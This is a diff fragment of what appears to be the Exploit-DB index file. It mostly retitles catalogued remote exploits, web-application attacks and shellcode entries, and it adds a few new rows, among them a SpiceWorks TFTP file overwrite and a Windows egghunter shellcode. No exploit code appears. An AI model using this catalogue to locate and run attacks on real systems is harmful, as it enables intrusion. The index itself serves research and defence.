2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow",2006-12-15,"Solar Eclipse",linux,remote,389 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0 -2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 +2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - 'utl_file' File System Access Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0 3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 @@ -10384,7 +10386,7 @@ id,file,description,date,author,platform,type,port 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21 -11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 +11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution (via Cross Application Scripting)",2010-03-20,emgent,multiple,remote,0 11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11856,platforms/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0 @@ -10595,7 +10597,7 @@ id,file,description,date,author,platform,type,port 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 -15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - 'src .php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0 +15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server - Arbitrary '.php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 18245,platforms/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 @@ -10603,7 +10605,7 @@ id,file,description,date,author,platform,type,port 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote,0 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 -15963,platforms/windows/remote/15963.rb,"Microsoft Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 +15963,platforms/windows/remote/15963.rb,"Microsoft Windows - Common Control Library (Comctl32) Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Exploit (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0 @@ -11582,7 +11584,7 @@ id,file,description,date,author,platform,type,port 19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0 19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 -19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 +19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 @@ -11636,7 +11638,7 @@ id,file,description,date,author,platform,type,port 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - Overflow (SEH)",2012-07-06,"motaz reda",windows,remote,888 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow",1999-11-13,scut,linux,remote,0 -19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0 +19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0 19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal",1999-11-29,"Ussr Labs",multiple,remote,0 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,unix,remote,0 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)",1999-11-30,"Synnergy Networks",unix,remote,0 @@ -11812,7 +11814,7 @@ id,file,description,date,author,platform,type,port 20103,platforms/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",windows,remote,0 20104,platforms/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - '%00' Request File/Directory Disclosure",2000-07-21,zorgon,multiple,remote,0 20105,platforms/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,linux,remote,0 -20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0 +20106,platforms/windows/remote/20106.cpp,"Microsoft Windows NT 4.0/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",windows,remote,0 20112,platforms/windows/remote/20112.rb,"Cisco Linksys PlayerPT - ActiveX Control Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,remote,0 20113,platforms/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 - pbcontrol.php Command Injection (Metasploit)",2012-07-27,Metasploit,linux,remote,0 20301,platforms/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,windows,remote,0 @@ -11836,7 +11838,7 @@ id,file,description,date,author,platform,type,port 20156,platforms/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal",2000-08-17,"Marc Maiffret",cgi,remote,0 20157,platforms/linux/remote/20157.c,"UMN Gopherd 2.x - Halidate Function Buffer Overflow",2000-08-20,"Chris Sharp",linux,remote,0 20159,platforms/linux/remote/20159.c,"Darxite 0.4 - Login Buffer Overflow",2000-08-22,Scrippie,linux,remote,0 -20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution Via URLs",2000-08-17,"zenith parsec",linux,remote,0 +20161,platforms/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution via URLs",2000-08-17,"zenith parsec",linux,remote,0 20163,platforms/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 - Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,unix,remote,0 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 @@ -12389,7 +12391,7 @@ id,file,description,date,author,platform,type,port 21475,platforms/windows/remote/21475.txt,"LocalWEB2000 2.1.0 Standard - File Disclosure",2002-05-24,"Tamer Sahin",windows,remote,0 21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",windows,remote,0 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0 -21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT4 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0 +21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0 21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0 21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - Source.jsp Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 @@ -12541,7 +12543,7 @@ id,file,description,date,author,platform,type,port 21888,platforms/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution (Metasploit)",2012-10-11,Metasploit,windows,remote,0 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0 -21902,platforms/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 +21902,platforms/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote,0 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Trojan Horse",2002-10-08,netmask,unix,remote,0 @@ -12629,7 +12631,7 @@ id,file,description,date,author,platform,type,port 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 22185,platforms/windows/remote/22185.txt,"Sambar Server 5.x - results.stm Cross-Site Scripting",2003-01-20,galiarept,windows,remote,0 22187,platforms/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",linux,remote,0 -22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0 +22194,platforms/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",windows,remote,0 22200,platforms/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",multiple,remote,0 22201,platforms/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,multiple,remote,0 22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure",2003-01-26,"Jouko Pynnönen",linux,remote,0 @@ -12642,7 +12644,7 @@ id,file,description,date,author,platform,type,port 22229,platforms/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote,0 22236,platforms/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,hardware,remote,0 22244,platforms/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote,0 -22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4 / SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 +22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 gethostbyname() - Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0 22264,platforms/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",linux,remote,0 22269,platforms/windows/remote/22269.txt,"Sage 1.0 Beta 3 - Content Management System Full Path Disclosure",2003-02-20,euronymous,windows,remote,0 22270,platforms/windows/remote/22270.txt,"Sage 1.0 Beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,windows,remote,0 @@ -12676,10 +12678,10 @@ id,file,description,date,author,platform,type,port 22355,platforms/cgi/remote/22355.txt,"Thunderstone TEXIS 3.0 - 'texis.exe' Information Disclosure",2003-03-14,sir.mordred@hushmail.com,cgi,remote,0 22356,platforms/unix/remote/22356.c,"Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow",2003-03-15,flatline,unix,remote,0 22361,platforms/linux/remote/22361.cpp,"Qpopper 3/4 - 'Username' Information Disclosure",2003-03-11,plasmahh,linux,remote,0 -22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0 -22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0 -22367,platforms/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0 -22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4) - WebDAV 'ntdll.dll' Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 +22365,platforms/windows/remote/22365.pl,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (1)",2003-03-24,mat,windows,remote,0 +22366,platforms/windows/remote/22366.c,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (2)",2003-03-31,ThreaT,windows,remote,0 +22367,platforms/windows/remote/22367.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (3)",2003-04-04,"Morning Wood",windows,remote,0 +22368,platforms/windows/remote/22368.txt,"Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Buffer Overflow (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x - UUEncoding Parsing Memory Corruption",2003-03-17,"Core Security",linux,remote,0 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion",2003-03-19,"Core Security",linux,remote,0 22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd - ChooseFilePath Buffer Overflow (Metasploit)",2012-11-01,Metasploit,windows,remote,0 @@ -12790,13 +12792,13 @@ id,file,description,date,author,platform,type,port 22787,platforms/windows/remote/22787.rb,"Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-11-19,Metasploit,windows,remote,0 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Directory Traversal",2003-06-18,dr_insane,windows,remote,0 22807,platforms/windows/remote/22807.txt,"SurfControl Web Filter 4.2.0.1 - File Disclosure",2003-06-19,"thomas adams",windows,remote,0 -22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0 +22824,platforms/windows/remote/22824.txt,"Microsoft Windows XP/2000/NT 4.0 - HTML Converter HR Align Buffer Overflow",2003-06-23,"Digital Scream",windows,remote,0 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent - Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0 22830,platforms/linux/remote/22830.c,"LBreakout2 2.x - Login Remote Format String",2003-06-24,V9,linux,remote,0 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0 22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0 22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0 -22837,platforms/windows/remote/22837.c,"Microsoft Windows NT 4/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 +22837,platforms/windows/remote/22837.c,"Microsoft Windows NT 4.0/2000 - Media Services 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0 @@ -13404,7 +13406,7 @@ id,file,description,date,author,platform,type,port 25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,windows,remote,0 25166,platforms/windows/remote/25166.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (1)",2004-12-26,"Miguel Tarasc",windows,remote,0 25167,platforms/windows/remote/25167.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (2)",2005-02-27,class101,windows,remote,0 -25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote .png Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote,0 +25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote '.png' Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote,0 25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i - Multiple Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 25196,platforms/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 - Offline Mode Status Remote Buffer Overflow",2005-03-08,"Mehrtash Mallahzadeh",windows,remote,0 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",multiple,remote,0 @@ -14037,7 +14039,7 @@ id,file,description,date,author,platform,type,port 30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,hardware,remote,32764 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0 30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 -30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted .ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 +30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 30935,platforms/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,windows,remote,0 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0 @@ -15423,6 +15425,7 @@ id,file,description,date,author,platform,type,port 41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0 41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0 41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0 +41825,platforms/windows/remote/41825.txt,"SpiceWorks 7.5 TFTP - Remote File Overwrite / Upload",2017-04-05,hyp3rlinx,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -16055,6 +16058,7 @@ id,file,description,date,author,platform,type,port 41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0 +41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -16249,7 +16253,7 @@ id,file,description,date,author,platform,type,port 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps,0 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0 1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,php,webapps,0 -1340,platforms/php/webapps/1340.php,"eFiction 2.0 - 'Fake .gif' Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 +1340,platforms/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0 @@ -17028,7 +17032,7 @@ id,file,description,date,author,platform,type,port 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - File Inclusion",2006-10-13,bd0rk,php,webapps,0 2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0 -2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via mysqladmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 +2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - centipaid_class.php Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 @@ -24763,8 +24767,8 @@ id,file,description,date,author,platform,type,port 41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0 16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0 41801,platforms/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",multiple,webapps,0 -41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 -41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0 +41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2 (12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 +41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2 (12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0 41799,platforms/multiple/webapps/41799.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 41800,platforms/multiple/webapps/41800.html,"Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps,0 @@ -25230,7 +25234,7 @@ id,file,description,date,author,platform,type,port 17869,platforms/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben 